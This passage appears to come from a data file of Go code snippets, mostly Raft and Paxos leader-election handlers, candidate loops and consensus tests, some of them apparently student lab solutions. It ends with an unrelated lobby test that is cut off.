{\n\t\tt.Fatalf(\"node 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif n2.state != StateFollower {\n\t\tt.Fatalf(\"node 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n\tif n3.state != StateCandidate {\n\t\tt.Fatalf(\"node 3 state: %s, want %s\", n3.state, StateCandidate)\n\t}\n\n\t// check term\n\t// n1.Term == 2\n\t// n2.Term == 2\n\t// n3.Term == 4\n\tif n1.Term != 2 {\n\t\tt.Fatalf(\"node 1 term: %d, want %d\", n1.Term, 2)\n\t}\n\tif n2.Term != 2 {\n\t\tt.Fatalf(\"node 2 term: %d, want %d\", n2.Term, 2)\n\t}\n\tif n3.Term != 4 {\n\t\tt.Fatalf(\"node 3 term: %d, want %d\", n3.Term, 4)\n\t}\n\n\t// Enable prevote on n3, then recover the network\n\tn3.preVote = true\n\tnt.recover()\n\n\treturn nt\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer DPrintf(\"%d received RequestVote from %d, args.Term : %d, args.LastLogIndex: %d, args.LastLogTerm: %d, rf.log: %v, rf.voteFor: %d, \" +\n\t\t\"reply: %v\", rf.me, args.CandidatedId, args.Term, args.LastLogIndex, args.LastLogTerm, rf.log, rf.voteFor, reply)\n\t// Your code here (2A, 2B).\n\trf.resetElectionTimer()\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\tlastLogIndex := rf.log[len(rf.log)-1].Index\n\tlastLogTerm := rf.log[lastLogIndex].Term\n\n\tif lastLogTerm > args.LastLogTerm || (args.LastLogTerm == lastLogTerm && args.LastLogIndex < lastLogIndex) {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t// 5.1 Reply false if term < currentTerm\n\tif args.Term < rf.currentTerm {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\tif (args.Term == rf.currentTerm && rf.state == \"leader\") || (args.Term == rf.currentTerm && rf.voteFor != -1){\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\tif args.Term == rf.currentTerm && rf.voteFor == args.CandidatedId {\n\t\treply.VoteGranted = true\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t// Rules for Servers\n\t// All Servers\n\t// If RPC request or response contains term T > currentTerm: set currentTerm = T, convert to follower\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.voteFor = -1\n\t\trf.mu.Unlock()\n\t\trf.changeState(\"follower\")\n\t\trf.mu.Lock()\n\t}\n\n\trf.voteFor = args.CandidatedId\n\treply.VoteGranted = true\n\t//rf.persist()\n\trf.mu.Unlock()\n\treturn\n}", "func TestLeaderTransferWithCheckQuorum(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tfor i := 1; i < 4; i++ {\n\t\tr := nt.peers[uint64(i)].(*raft)\n\t\tr.checkQuorum = true\n\t\tsetRandomizedElectionTimeout(r, r.electionTimeout+i)\n\t}\n\n\t// Letting peer 2 electionElapsed reach to timeout so that it can vote for peer 1\n\tf := nt.peers[2].(*raft)\n\tfor i := 0; i < f.electionTimeout; i++ {\n\t\tf.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (n *Node) requestVotes(currTerm uint64) (fallback, electionResult bool) {\n\t// TODO: Students should implement this method\n\treturn\n}", "func (r *Raft) candidate() int {\n\t//myId := r.Myconfig.Id\n\t//fmt.Println(\"Election started!I am\", myId)\n\n\t//reset the votes else it will reflect the votes received in last term\n\tr.resetVotes()\n\n\t//--start election timer for election-time out time, so when responses stop coming it must restart the election\n\n\twaitTime := 10\n\t//fmt.Println(\"ELection timeout is\", waitTime)\n\tElectionTimer := r.StartTimer(ElectionTimeout, waitTime)\n\t//This loop is for election process which keeps on going until a leader is elected\n\tfor {\n\t\tr.currentTerm = r.currentTerm + 1 //increment current term\n\t\t//fmt.Println(\"I am candidate\", r.Myconfig.Id, \"and current term is now:\", r.currentTerm)\n\n\t\tr.votedFor = r.Myconfig.Id //vote for self\n\t\tr.WriteCVToDisk() //write Current term and votedFor to disk\n\t\tr.f_specific[r.Myconfig.Id].vote = true\n\n\t\t//fmt.Println(\"before calling prepRV\")\n\t\treqVoteObj := r.prepRequestVote() //prepare request vote obj\n\t\t//fmt.Println(\"after calling prepRV\")\n\t\tr.sendToAll(reqVoteObj) //send requests for vote to all servers\n\t\t//this loop for reading responses from all servers\n\t\tfor {\n\t\t\treq := r.receive()\n\t\t\tswitch req.(type) {\n\t\t\tcase RequestVoteResponse: //got the vote response\n\t\t\t\tresponse := req.(RequestVoteResponse) //explicit typecasting so that fields of struct can be used\n\t\t\t\t//fmt.Println(\"Got the vote\", response.voteGranted)\n\t\t\t\tif response.voteGranted {\n\t\t\t\t\t//\t\t\t\t\ttemp := r.f_specific[response.id] //NOT ABLE TO DO THIS--WHY??--WORK THIS WAY\n\t\t\t\t\t//\t\t\t\t\ttemp.vote = true\n\n\t\t\t\t\tr.f_specific[response.id].vote = true\n\t\t\t\t\t//r.voteCount = r.voteCount + 1\n\t\t\t\t}\n\t\t\t\tvoteCount := r.countVotes()\n\t\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"Votecount is\", voteCount)\n\t\t\t\tif voteCount >= majority {\n\t\t\t\t\t//fmt.Println(\"Votecount is majority, I am new leader\", r.Myconfig.Id)\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\tr.LeaderConfig.Id = r.Myconfig.Id //update leader details\n\t\t\t\t\treturn leader //become the leader\n\t\t\t\t}\n\n\t\t\tcase AppendEntriesReq: //received an AE request instead of votes, i.e. some other leader has been elected\n\t\t\t\trequest := req.(AppendEntriesReq)\n\t\t\t\t//Can be clubbed with serviceAppendEntriesReq with few additions!--SEE LATER\n\n\t\t\t\t//fmt.Println(\"I am \", r.Myconfig.Id, \"candidate,got AE_Req from\", request.leaderId, \"terms my,leader are\", r.currentTerm, request.term)\n\t\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\t\tappEntriesResponse := AppendEntriesResponse{}\n\t\t\t\tappEntriesResponse.followerId = r.Myconfig.Id\n\t\t\t\tappEntriesResponse.success = false //false by default, in case of heartbeat or invalid leader\n\t\t\t\tif request.term >= r.currentTerm { //valid leader\n\t\t\t\t\tr.LeaderConfig.Id = request.leaderId //update leader info\n\t\t\t\t\tElectionTimer.Reset(waitTime_secs) //reset the timer\n\t\t\t\t\tvar myLastIndexTerm int\n\t\t\t\t\tif len(r.myLog) == 0 {\n\t\t\t\t\t\tmyLastIndexTerm = -1\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\tmyLastIndexTerm = r.myLog[r.myMetaData.lastLogIndex].Term\n\t\t\t\t\t}\n\t\t\t\t\tif request.leaderLastLogIndex == r.myMetaData.lastLogIndex && request.term == myLastIndexTerm { //this is heartbeat from a valid leader\n\t\t\t\t\t\tappEntriesResponse.success = true\n\t\t\t\t\t}\n\t\t\t\t\tsend(request.leaderId, appEntriesResponse)\n\t\t\t\t\treturn follower\n\t\t\t\t} else {\n\t\t\t\t\t//check if log is same\n\t\t\t\t\t//fmt.Println(\"In candidate, AE_Req-else\")\n\t\t\t\t\tsend(request.leaderId, appEntriesResponse)\n\t\t\t\t}\n\t\t\tcase int:\n\t\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\t\tElectionTimer.Reset(waitTime_secs)\n\t\t\t\tbreak //come out of inner loop i.e. restart the election process\n\t\t\t\t//default: if something else comes, then ideally it should ignore that and again wait for correct type of response on channel\n\t\t\t\t//it does this, in the present code structure\n\t\t\t}\n\t\t}\n\t}\n}", "func (r *Raft) candidate(timeout int) int {\n\twaitTime := timeout //added for passing timeout from outside--In SingleServerBinary\n\tresendTime := 5 //should be much smaller than waitTime\n\tElectionTimer := r.StartTimer(ElectionTimeout, waitTime)\n\t//This loop is for election process which keeps on going until a leader is elected\n\tfor {\n\t\t//reset the Votes else it will reflect the Votes received in last Term\n\t\tr.resetVotes()\n\t\tr.myCV.CurrentTerm += 1 //increment current Term\n\t\tr.myCV.VotedFor = r.Myconfig.Id //Vote for self\n\t\tr.WriteCVToDisk() //write Current Term and VotedFor to disk\n\t\tr.f_specific[r.Myconfig.Id].Vote = true //vote true\n\t\treqVoteObj := r.prepRequestVote() //prepare request Vote obj\n\t\tr.sendToAll(reqVoteObj) //send requests for Vote to all servers\n\t\tResendVoteTimer := r.StartTimer(ResendVoteTimeOut, resendTime)\n\t\tfor { //this loop for reading responses from all servers\n\t\t\treq := r.receive()\n\t\t\tswitch req.(type) {\n\t\t\tcase ClientAppendReq: ///candidate must also respond as false just like follower\n\t\t\t\trequest := req.(ClientAppendReq) //explicit typecasting\n\t\t\t\tresponse := ClientAppendResponse{}\n\t\t\t\tlogItem := LogItem{r.CurrentLogEntryCnt, false, request.Data} //lsn is count started from 0\n\t\t\t\tr.CurrentLogEntryCnt += 1\n\t\t\t\tresponse.LogEntry = logItem\n\t\t\t\tr.CommitCh <- &response.LogEntry\n\t\t\tcase RequestVoteResponse: //got the Vote response\n\t\t\t\tresponse := req.(RequestVoteResponse) //explicit typecasting so that fields of struct can be used\n\t\t\t\tif response.VoteGranted {\n\t\t\t\t\tr.f_specific[response.Id].Vote = true\n\t\t\t\t}\n\t\t\t\tVoteCount := r.countVotes()\n\t\t\t\tif VoteCount >= majority {\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\tr.LeaderConfig.Id = r.Myconfig.Id //update leader details\n\t\t\t\t\treturn leader //become the leader\n\t\t\t\t}\n\n\t\t\tcase AppendEntriesReq: //received an AE request instead of Votes, i.e. some other leader has been elected\n\t\t\t\trequest := req.(AppendEntriesReq)\n\t\t\t\tretVal := r.serviceAppendEntriesReq(request, nil, 0, candidate)\n\t\t\t\tif retVal == follower {\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\treturn follower\n\t\t\t\t}\n\n\t\t\tcase RequestVote:\n\t\t\t\trequest := req.(RequestVote)\n\t\t\t\t//==Can be shared with service request vote with additinal param of caller(candidate or follower)\n\t\t\t\tresponse := RequestVoteResponse{} //prep response object,for responding back to requester\n\t\t\t\tcandidateId := request.CandidateId\n\t\t\t\tresponse.Id = r.Myconfig.Id\n\t\t\t\tif r.isDeservingCandidate(request) {\n\t\t\t\t\tresponse.VoteGranted = true\n\t\t\t\t\tr.myCV.VotedFor = candidateId\n\t\t\t\t\tr.myCV.CurrentTerm = request.Term\n\t\t\t\t\tif request.Term > r.myCV.CurrentTerm { //write to disk only when value has changed\n\t\t\t\t\t\tr.WriteCVToDisk()\n\t\t\t\t\t}\n\t\t\t\t\tResendVoteTimer.Stop()\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\treturn follower\n\t\t\t\t} else {\n\t\t\t\t\tresponse.VoteGranted = false\n\t\t\t\t}\n\t\t\t\tresponse.Term = r.myCV.CurrentTerm\n\t\t\t\tr.send(candidateId, response)\n\n\t\t\tcase int:\n\t\t\t\ttimeout := req.(int)\n\t\t\t\tif timeout == ResendVoteTimeOut {\n\t\t\t\t\trT := msecs * time.Duration(resendTime)\n\t\t\t\t\tResendVoteTimer.Reset(rT)\n\t\t\t\t\treqVoteObj := r.prepRequestVote() //prepare request Vote agn and send to all, ones rcvg the vote agn will vote true agn so won't matter and countVotes func counts no.of true entries\n\t\t\t\t\tr.sendToAll(reqVoteObj)\n\t\t\t\t} else if timeout == ElectionTimeout {\n\t\t\t\t\twaitTime_msecs := msecs * time.Duration(waitTime)\n\t\t\t\t\tElectionTimer.Reset(waitTime_msecs)\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func TestShiftToLeaderElection(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 3})\n\n\tconst newView = 7\n\tp.shiftToLeaderElection(newView)\n\n\tassertState(t, p, StateLeaderElection)\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif len(p.prepareOKs) > 0 {\n\t\tt.Fatalf(\"expected empty prepareOKs set\")\n\t}\n\tif len(p.lastEnqueued) > 0 {\n\t\tt.Fatalf(\"expected empty lastEnqueued set\")\n\t}\n\tif p.lastAttempted != newView {\n\t\tt.Fatalf(\"expected lastAttempted view %d, found %d\", newView, p.lastAttempted)\n\t}\n\n\texpViewChanges := map[uint64]*pb.ViewChange{\n\t\t1: &pb.ViewChange{\n\t\t\tNodeId: 1,\n\t\t\tAttemptedView: 7,\n\t\t},\n\t}\n\tif !reflect.DeepEqual(p.viewChanges, expViewChanges) {\n\t\tt.Errorf(\"expected view changes %+v, found %+v\", expViewChanges, p.viewChanges)\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// follow the second rule in \"Rules for Servers\" in figure 2 before handling an incoming RPC\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.state = FOLLOWER\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = true\n\t// deny vote if already voted\n\tif rf.votedFor != -1 {\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// deny vote if consistency check fails (candidate is less up-to-date)\n\tlastLog := rf.log[len(rf.log)-1]\n\tif args.LastLogTerm < lastLog.Term || (args.LastLogTerm == lastLog.Term && args.LastLogIndex < len(rf.log)-1) {\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// now this peer must vote for the candidate\n\trf.votedFor = args.CandidateID\n\trf.mu.Unlock()\n\n\trf.resetTimer()\n}", "func TestFollowerVote(t *testing.T) {\n\ttests := []struct {\n\t\tvote uint64\n\t\tnvote uint64\n\t\twreject bool\n\t}{\n\t\t{None, 1, false},\n\t\t{None, 2, false},\n\t\t{1, 1, false},\n\t\t{2, 2, false},\n\t\t{1, 2, true},\n\t\t{2, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Term: 1, Vote: tt.vote})\n\n\t\tr.Step(pb.Message{From: tt.nvote, FromGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTerm: 1, Type: pb.MsgVote})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: tt.nvote, ToGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\t\tTerm: 1, Type: pb.MsgVoteResp, Reject: tt.wreject},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %v, want %v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\t// Your code here (2A, 2B).\n\n\tDPrintf(\" before %v 's request,%v 's votefor is %v\", args.CandidateId, rf.me, rf.voteFor)\n\t//log.Printf(\" before %v 's request,%v 's votefor is %v\", args.CandidateId, rf.me, rf.voteFor)\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\tlog.Printf(\" before %v 's request,%v 's votefor is %v\", args.CandidateId, rf.me, rf.voteFor)\n\n\tDPrintf(\" %v's requesetvote args is %v, and the reciever %v currentTerm is %v\", args.CandidateId, *args, rf.me, rf.currentTerm)\n\t//log.Printf(\" %v's requesetvote args is %v, and the reciever %v currentTerm is %v\", args.CandidateId, *args, rf.me, rf.currentTerm)\n\n\t// all servers\n\tif rf.currentTerm < args.Term {\n\t\trf.convertToFollower(args.Term)\n\t}\n\n\t_voteGranted := false\n\tif rf.currentTerm == args.Term && (rf.voteFor == VOTENULL || rf.voteFor == args.CandidateId) && (rf.getLastLogTerm() < args.LastLogTerm || (rf.getLastLogTerm() == args.LastLogTerm && rf.getLastLogIndex() <= args.LastLogIndex)) {\n\t\trf.state = Follower\n\t\tdropAndSet(rf.grantVoteCh)\n\t\t_voteGranted = true\n\t\trf.voteFor = args.CandidateId\n\t}\n\n\treply.VoteGranted = _voteGranted\n\treply.Term = rf.currentTerm\n\n\tDPrintf(\" after %v 's request,%v 's votefor is %v\", args.CandidateId, rf.me, rf.voteFor)\n\tlog.Printf(\" after %v 's request,%v 's votefor is %v\", args.CandidateId, rf.me, rf.voteFor)\n}", "func TestLeaderTransferReceiveHigherTermVote(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\t// Transfer leadership to isolated node to let transfer pending.\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup, Index: 1, Term: 2})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n}", "func (rf *Raft) handleVoteReply(reply* RequestVoteReply) {\n\tDebugPrint(\"%d(%d): receive vote reply from %d(%d), state: %d\\n\",\n\t\trf.me, rf.term, reply.To, reply.Term, rf.state)\n\tstart := time.Now()\n\tdefer calcRuntime(start, \"handleVoteReply\")\n\tif !rf.checkVote(reply.To, reply.Term, reply.MsgType, &reply.VoteGranted) {\n\t\treturn\n\t}\n\tif (rf.state == Candidate && reply.MsgType == MsgRequestVoteReply) ||\n\t\t(rf.state == PreCandidate && reply.MsgType == MsgRequestPrevoteReply) {\n\t\tDebugPrint(\"%d(%d): access vote reply from %d(%d), accept: %t, state: %d\\n\",\n\t\t\trf.me, rf.term, reply.To, reply.Term, reply.VoteGranted, rf.state)\n\t\tif reply.VoteGranted {\n\t\t\trf.votes[reply.To] = 1\n\t\t} else {\n\t\t\trf.votes[reply.To] = 0\n\t\t}\n\t\tquorum := len(rf.peers) / 2 + 1\n\t\taccept := 0\n\t\treject := 0\n\t\tfor _, v := range rf.votes {\n\t\t\tif v == 1 {\n\t\t\t\taccept += 1\n\t\t\t} else if v == 0 {\n\t\t\t\treject += 1\n\t\t\t}\n\t\t}\n\t\tif accept >= quorum {\n\t\t\tfor idx, v := range rf.votes {\n\t\t\t\tif v == 1 {\n\t\t\t\t\tDebugPrint(\"%d vote for me(%d).\\n\", idx, rf.me)\n\t\t\t\t}\n\t\t\t}\n\t\t\tDebugPrint(\"%d win.\\n\", rf.me)\n\t\t\tif rf.state == PreCandidate {\n\t\t\t\tfmt.Printf(\"The server %d, wins Pre-vote Election\\n\", rf.me)\n\t\t\t\trf.campaign(MsgRequestVote)\n\t\t\t} else {\n\t\t\t\tDebugPrint(\"%d win vote\\n\", rf.me)\n\t\t\t\trf.becomeLeader()\n\t\t\t\tfmt.Printf(\"The server %d, wins Election\\n\", rf.me)\n\t\t\t\t// rf.propose(nil, rf.raftLog.GetDataIndex())\n\t\t\t\trf.proposeNew(nil, rf.raftLog.GetDataIndex(), rf.me)\n\t\t\t}\n\t\t} else if reject == quorum {\n\t\t\tDebugPrint(\"%d has been reject by %d members\\n\", rf.me, reject)\n\t\t\trf.becomeFollower(rf.term, -1)\n\t\t}\n\t}\n\tDebugPrint(\"%d(%d): receive vote end\\n\", rf.me, rf.term)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\n\trf.mu.Lock()\n\trf.debug(\"***************Inside the RPC handler for sendRequestVote *********************\")\n\tdefer rf.mu.Unlock()\n\tvar lastIndex int\n\t//var lastTerm int\n\tif len(rf.log) > 0 {\n\t\tlastLogEntry := rf.log[len(rf.log)-1]\n\t\tlastIndex = lastLogEntry.LastLogIndex\n\t\t//lastTerm = lastLogEntry.lastLogTerm\n\t}else{\n\t\tlastIndex = 0\n\t\t//lastTerm = 0\n\t}\n\treply.Term = rf.currentTerm\n\t//rf.debug()\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t\trf.debug(\"My term is higher than candidate's term, myTerm = %d, candidate's term = %d\", rf.currentTerm,args.Term )\n\t} else if (rf.votedFor == -1 || rf.votedFor == args.CandidateId) && args.LastLogIndex >= lastIndex {\n\t\trf.votedFor = args.CandidateId\n\t\treply.VoteGranted = true\n\t\trf.currentTerm = args.Term\n\t\trf.resetElectionTimer()\n\t\t//rf.debug(\"I am setting my currentTerm to -->\",args.Term,\"I am \",rf.me)\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n fmt.Printf(\"\\n -> I the Peer %d in got Vote Request from cadidate %d!\\n\",rf.me, args.CandidateId)\n \n rf.mu.Lock()\n defer rf.mu.Unlock() // TODO: ask professor/TA about this atomisitc and if mutex is needed.\n \n reply.FollowerTerm = rf.currentTerm\n \n rf.CheckTerm(args.CandidateTerm) \n \n // 2B code - fix if needed\n logUpToDate := false\n if len(rf.log) == 0 {\n logUpToDate = true\n } else if rf.log[len(rf.log)-1].Term < args.LastLogTerm {\n logUpToDate = true\n } else if rf.log[len(rf.log)-1].Term == args.LastLogTerm && \n len(rf.log) <= (args.LastLogIndex+1) {\n logUpToDate = true\n }\n // 2B code end\n \n reply.VoteGranted = (rf.currentTerm <= args.CandidateTerm && \n (rf.votedFor == -1 || rf.votedFor == args.CandidateId) &&\n logUpToDate) \n\n if reply.VoteGranted {\n rf.votedFor = args.CandidateId\n fmt.Printf(\"-> I the Peer %d say: Vote for cadidate %d Granted!\\n\",rf.me, args.CandidateId)\n } else {\n fmt.Printf(\"-> I the Peer %d say: Vote for cadidate %d Denied :/\\n\",rf.me, args.CandidateId)\n }\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tlastLogIndex, lastLogTerm := len(rf.log) + rf.compactIndex , 0\n\tif lastLogIndex > rf.compactIndex {\n\t\tlastLogTerm = rf.log[lastLogIndex - rf.compactIndex -1].Term\n\t} else if lastLogIndex == rf.compactIndex {\n\t\tlastLogTerm = rf.compactTerm\n\t}\n\n\tif args.Term < rf.currentTerm || (args.Term == rf.currentTerm && args.CandidateID != rf.votedFor) || args.LastLogTerm < lastLogTerm || (args.LastLogTerm == lastLogTerm && lastLogIndex > args.LastLogIndex) {\n\t\t// 1. The Term of RequestVote is out of date.\n\t\t// 2. The instance vote for other peer in this term.\n\t\t// 3. The log of Candidate is not the most update.\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t} else {\n\t\t// DPrintf(\"instance %d vote for %d, Term is %d, lastLogTerm is %d, args.LastLogTerm is %d, lastLogIndex is %d, args.LastLogIndex is %d, original votedFor is %d\", rf.me, args.CandidateID, args.Term, lastLogTerm, args.LastLogTerm, lastLogIndex, args.LastLogIndex, rf.votedFor)\n\t\trf.votedFor = args.CandidateID\n\t\trf.currentTerm = args.Term\n\n\t\treply.VoteGranted = true\n\t\treply.Term = rf.currentTerm\n\n\t\tif rf.role == Follower {\n\t\t\trf.validRpcTimestamp = time.Now()\n\t\t} else {\n\t\t\t// Notify the change of the role of instance.\n\t\t\tclose(rf.rollback)\n\t\t\trf.role = Follower\n\t\t}\n\t}\n\n\treturn\n}", "func testNonleaderElectionTimeoutRandomized(t *testing.T, state StateType) {\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\ttimeouts := make(map[int]bool)\n\tfor round := 0; round < 50*et; round++ {\n\t\tswitch state {\n\t\tcase StateFollower:\n\t\t\tr.becomeFollower(r.Term+1, 2)\n\t\tcase StateCandidate:\n\t\t\tr.becomeCandidate()\n\t\t}\n\n\t\ttime := 0\n\t\tfor len(r.readMessages()) == 0 {\n\t\t\tr.tick()\n\t\t\ttime++\n\t\t}\n\t\ttimeouts[time] = true\n\t}\n\n\tfor d := et + 1; d < 2*et; d++ {\n\t\tif !timeouts[d] {\n\t\t\tt.Errorf(\"timeout in %d ticks should happen\", d)\n\t\t}\n\t}\n}", "func (rf *Raft) runForElection() {\n\trf.lock()\n\trf.CurrentTerm += 1\n\trf.VotedFor = -1\n\trf.CurrentElectionState = Candidate\n\tad.DebugObj(rf, ad.RPC, \"Starting election and advancing term to %d\", rf.CurrentTerm)\n\trf.writePersist()\n\trepliesChan := make(chan *RequestVoteReply, len(rf.peers)-1)\n\t// The term the election was started in\n\telectionTerm := rf.CurrentTerm\n\trf.unlock()\n\n\tfor peerNum, _ := range rf.peers {\n\t\tif peerNum == rf.me {\n\t\t\trf.lock()\n\t\t\trf.VotedFor = rf.me\n\t\t\tad.DebugObj(rf, ad.TRACE, \"voting for itself\")\n\t\t\trf.writePersist()\n\t\t\trf.unlock()\n\t\t} else {\n\t\t\tgo func(peerNum int, repliesChan chan *RequestVoteReply) {\n\t\t\t\trf.sendRequestVote(peerNum, repliesChan)\n\t\t\t}(peerNum, repliesChan)\n\t\t}\n\t}\n\n\tyesVotes := 1 // from yourself\n\tnoVotes := 0\n\trequiredToWin := rf.majoritySize()\n\tfor range rf.peers {\n\t\treply := <-repliesChan\n\n\t\trf.lock()\n\t\tassert(rf.CurrentElectionState != Leader)\n\t\tif rf.CurrentTerm != electionTerm {\n\t\t\tad.DebugObj(rf, ad.TRACE, \"advanced to term %d while counting results of election for term %d. \"+\n\t\t\t\t\"Abandoning election.\")\n\t\t\trf.unlock()\n\t\t\treturn\n\t\t}\n\n\t\tif reply.VoteGranted {\n\t\t\tyesVotes++\n\t\t} else {\n\t\t\tnoVotes++\n\t\t}\n\n\t\tad.DebugObj(rf, ad.TRACE, \"Got %+v from server %d, yes votes now at %d out of a required %d\",\n\t\t\treply, reply.VoterId, yesVotes, requiredToWin)\n\t\tif yesVotes >= requiredToWin {\n\t\t\tad.DebugObj(rf, ad.RPC, \"Won election!\")\n\t\t\t// non-blocking send\n\t\t\t// send the term number to prevent a bug where the raft advances to a new term before it notices it's\n\t\t\t// become a leader, so it becomes a second false leader.\n\t\t\tgo func(term int) { rf.becomeLeader <- term }(rf.CurrentTerm)\n\t\t\trf.unlock()\n\t\t\treturn\n\t\t} else if noVotes >= requiredToWin {\n\t\t\tad.DebugObj(rf, ad.RPC, \"Got %d no votes, can't win election. Reverting to follower\", noVotes)\n\t\t\trf.CurrentElectionState = Follower\n\t\t\trf.writePersist()\n\t\t\trf.unlock()\n\t\t\treturn\n\t\t} else {\n\t\t\trf.unlock()\n\t\t\t// wait for more votes\n\t\t}\n\t}\n}", "func (v *verifyFuture) vote(leader bool) {\n\tv.voteLock.Lock()\n\tdefer v.voteLock.Unlock()\n\n\t// Guard against having notified already\n\tif v.notifyCh == nil {\n\t\treturn\n\t}\n\n\tif leader {\n\t\tv.votes++\n\t\tif v.votes >= v.quorumSize {\n\t\t\tv.notifyCh <- v\n\t\t\tv.notifyCh = nil\n\t\t}\n\t} else {\n\t\tv.notifyCh <- v\n\t\tv.notifyCh = nil\n\t}\n}", "func TestLobbyReadyStatus(t *testing.T) {\n\tlobbySvc := NewLobbyService()\n\tlobby := lobbySvc.CreateLobby()\n\n\tres, found := lobbySvc.IsReady(lobby.ID)\n\tassert.True(t, found)\n\tassert.False(t, res)\n\n\t_, err := lobbySvc.JoinLobby(pogo.LobbyJoinMsg{LobbyID: lobby.ID, PlayerID: \"Player1\"})\n\tassert.NoError(t, err)\n\n\tres, found = lobbySvc.IsReady(lobby.ID)\n\tassert.True(t, found)\n\tassert.False(t, res)\n\n\t_, err = lobbySvc.ReadyPlayer(lobby.ID, pogo.PlayerReadyMsg{PlayerName: \"Player1\", Ready: true})\n\tassert.NoError(t, err)\n\n\tres, found = lobbySvc.IsReady(lobby.ID)\n\tassert.True(t, found)\n\tassert.False(t, res)\n\n\t_, err = lobbySvc.JoinLobby(pogo.LobbyJoinMsg{LobbyID: lobby.ID, PlayerID: \"Player2\"})\n\tassert.NoError(t, err)\n\n\t_, err = lobbySvc.JoinLobby(pogo.LobbyJoinMsg{LobbyID: lobby.ID, PlayerID: 